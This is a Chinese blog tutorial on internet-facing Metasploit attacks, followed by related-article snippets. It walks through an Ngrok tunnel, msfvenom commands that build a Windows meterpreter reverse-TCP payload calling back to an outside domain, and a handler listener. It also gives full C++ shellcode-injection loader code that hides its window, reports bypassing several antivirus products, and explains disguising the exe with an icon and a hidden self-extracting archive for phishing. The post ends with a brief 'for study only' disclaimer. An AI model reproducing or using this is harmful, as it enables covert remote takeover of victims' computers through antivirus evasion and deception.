MSF外网渗透+shellcode免杀
1. 内网穿透
使用的Sunny-Ngrok服务 。你在Sunny-Ngrok官网注册好后获得一条免费或付费的隧道,添加tcp通道,端口号自定。
官网链接:https://www.ngrok.cc/(Sunny-Ngrok服务 )
在kali下安装Sunny-Ngrok的客户端,在该目录下启动Sunny-Ngrok。
2. 外网渗透
生成外网木马。注意这里的lhost和lport为赠送的域名和远程端口号:
msfvenom -p windows/meterpreter/reverse_tcp lhost=xxxxx.xxxx.com lport=10011 -f exe > test.exe
这里使用nat模式实现虚拟机内外网隔离:
设置监听。
msf5> use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.43.157
msf5 exploit(multi/handler) > set lport 12581
msf5 exploit(multi/handler) > run
等待受害者主机上线
外网渗透成功
3. shellcode免杀
主要有”分离“、”混淆“、”注入“和加载器执行等方式免杀。
参考文章:https://xz.aliyun.com/t/7170#toc-4(shellcode免杀总结)
这里使用的是注入方式免杀:
使用msfvenom生成外网木马的c版本shellcode:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 15 \b '\x00' lhost=xxxx.xxxx.com lport=10011 -f c
然后使用c语言起一个正常进程注入shellcode:
// 1018.cpp : Defines the entry point for the application.
//
#include "stdafx.h"
#include <Windows.h>
#include<stdio.h>
#include <tchar.h>
#include "iostream"
using namespace std;unsigned char shellcode[] =#(这里放shellcode)BOOL injection()
{TCHAR Cappname[MAX_PATH] = { 0 };STARTUPINFO si;PROCESS_INFORMATION pi;LPVOID lpMalwareBaseAddr;LPVOID lpnewVictimBaseAddr;HANDLE hThread;DWORD dwExitCode;BOOL bRet = FALSE;lpMalwareBaseAddr = shellcode;GetSystemDirectory(Cappname, MAX_PATH);_tcscat(Cappname, "\\calc.exe");printf("Injection program Name:%S\r\n", Cappname);ZeroMemory(&si, sizeof(si));si.cb = sizeof(si);ZeroMemory(&pi, sizeof(pi));if (CreateProcess(Cappname, NULL, NULL, NULL,FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi) == 0){return bRet;}lpnewVictimBaseAddr = VirtualAllocEx(pi.hProcess, NULL, sizeof(shellcode) + 1, MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);if (lpnewVictimBaseAddr == NULL){return bRet;}WriteProcessMemory(pi.hProcess, lpnewVictimBaseAddr,(LPVOID)lpMalwareBaseAddr, sizeof(shellcode) + 1, NULL);hThread = CreateRemoteThread(pi.hProcess, 0, 0,(LPTHREAD_START_ROUTINE)lpnewVictimBaseAddr, NULL, 0, NULL);WaitForSingleObject(pi.hThread, INFINITE);GetExitCodeProcess(pi.hProcess, &dwExitCode);TerminateProcess(pi.hProcess, 0);return bRet;
}void help(char* proc)
{printf("%s:[-] \nstart a process and injection shellcode to memory\r\n", proc);
}int main(int argc, char* argv[])
{HWND hwndDOS = GetForegroundWindow(); //得到前台窗口的句柄ShowWindow(hwndDOS, SW_HIDE); //隐藏窗口help(argv[0]);injection();return 0;
}
编译组建生成exe,验证360免杀:
QQ安全管家免杀:
火绒免杀:
但是无法绕过win10微软防火墙。
4. 修改图标
在线.png转换.ico:https://www.img2go.com/zh/convert/png-to-ico
使用Resource Hacker软件修改exe图标,官网下载地址:http://www.angusj.com/resourcehacker/
将exe程序拖进来,添加图标选择.ico文件最后保存即可
最后得到的新文件
5. 自解压钓鱼
创建自解压文件
点击高级,自解压选项,常规,设置自解压路径
点击设置,设置解压后运行文件路径
模式选择全部隐藏
更新设置成覆盖所有文件,保证二次自解压不报错,不会引起怀疑
修改自解压文件图标
至此exe伪装就完成了
最后,本文章仅供学习,请遵守法律
参考链接:
https://www.fujieace.com/kali-linux/msf-extranet-intranet.html(msf外网渗透)
https://xz.aliyun.com/t/7170#toc-4(shellcode免杀总结)
https://mp.weixin.qq.com/s/lKmGwk1uXFw83UuNpntf_w(网络钓鱼)
MSF外网渗透+shellcode免杀相关推荐
- msfvenom的使用免杀外网渗透
msfvenom的基本使用 这玩意是啥我就不介绍了,懂得都懂. 这篇博客将结合我本人的自身经验来说明大致的使用方式,这里的话只介绍,目前比较常用的几个方法和参数. payload 查看与使用 payl ...
- Kali使用Metasploit内、外网渗透windows系统
Metasploit是一个免费的.可下载的框架,通过它可以很容易地获取.开发并对计算机软件漏洞实施攻击.它本身附带数千个已知软件漏洞的专业级漏洞攻击工具.当H.D. Moore在2003年发布Meta ...
- Shellcode免杀,过360、火绒、windows-Defender
shellcode简介 Shellcode,顾名思义是一段拿来执行的代码片段,我们可以使用Shellcode来完成我们需要的任务 弹窗的代码,可以被认为是一段Shellcode,获取某个模块的基址的代 ...
- 远控免杀专题(29)-C#加载shellcode免杀-5种方式(VT免杀率8-70)
0x00 免杀能力一览表 几点说明: 1.表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass. 2.为了更好的对比效果,大部分测试payload均使用msf的windows/mete ...
- 【Windows】Shellcode免杀,过360、火绒、Defender 静态及主防
Shellcode,顾名思义是一段拿来执行的代码片段,我们可以使用Shellcode来完成我们需要的任务 弹窗的代码,可以被认为是一段Shellcode,获取某个模块的基址的代码,也可以被认为是一段S ...
- Python shellcode免杀
浅谈Python shellcode免杀 一.前言 在安全厂商日趋成熟的背景下,编写免杀马的难度和成本日益增长.很多师傅好用的开源免杀项目公布出来的同时几乎也就意味它的失效,对于一些和我一样对系统底 ...
- MSF编码+VS编译木马免杀
MSF编码+VS编译木马免杀 msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform LHOST=XXX LPORT=XXX -e ...
- 【网络安全】MSF内网渗透
MSF内网渗透 一.MSF介绍 1.简介 2.功能 (1)渗透攻击(Exploit) (2)攻击载荷(Payload) (3)溢出代码(Shellcode) (4)模块(Module) (5)监听器( ...
- 超牛叉的外网渗透详细教程
文章来源 简书 https://mp.weixin.qq.com/s/oGUDJxPOfCz2CW-mCeeAlQ(原文) 众所周知,Metasploit 是个内网渗透神器. 但是内网渗透哪有外网刺激 ...
最新文章
- 论外部调用代理应该属于那一层
- 第一次失效_爱搞机官方出品!永不失效的看片神器,第一次使用就爱上了
- matlab图像边缘检测分析
- android 富文本框架_当微擎框架遇上uniapp,以一当十同时开发十个平台项目
- php if多条件_PHP的数据类型
- Anaconda Python3.6 OpenCV4.1.0 Ubuntu 16.04源码编译
- 如何设置mysql的运行目录_如何修改mysql数据库文件的路径 | 学步园
- RESTFULL 03 rest-framework视图
- C#+OpenGL+FreeType显示3D文字(3) - 用PointSprite绘制文字
- 【知识图谱系列】多关系异质知识图谱表示学习综述
- 快收藏!最适合计算机大学生的Java毕业设计项目--高校食堂点餐系统
- TOAD 调试存储过程的方法
- Flink-电商用户行为分析(网站独立访客数(UV)的统计)
- FPGA笔记之verilog语言(基础语法篇)
- RecyclerView clipToPadding
- 【Codeforces 1157F】 Maximum Balanced Circle | 思维、dp、二分
- vue路由守卫beforeEach和afterEach
- Angular5.x多环境配置(开发环境、生产环境、测试环境)
- 笔记 | 杂谈控制固定效应这件事
- Wi-Fi 网络结构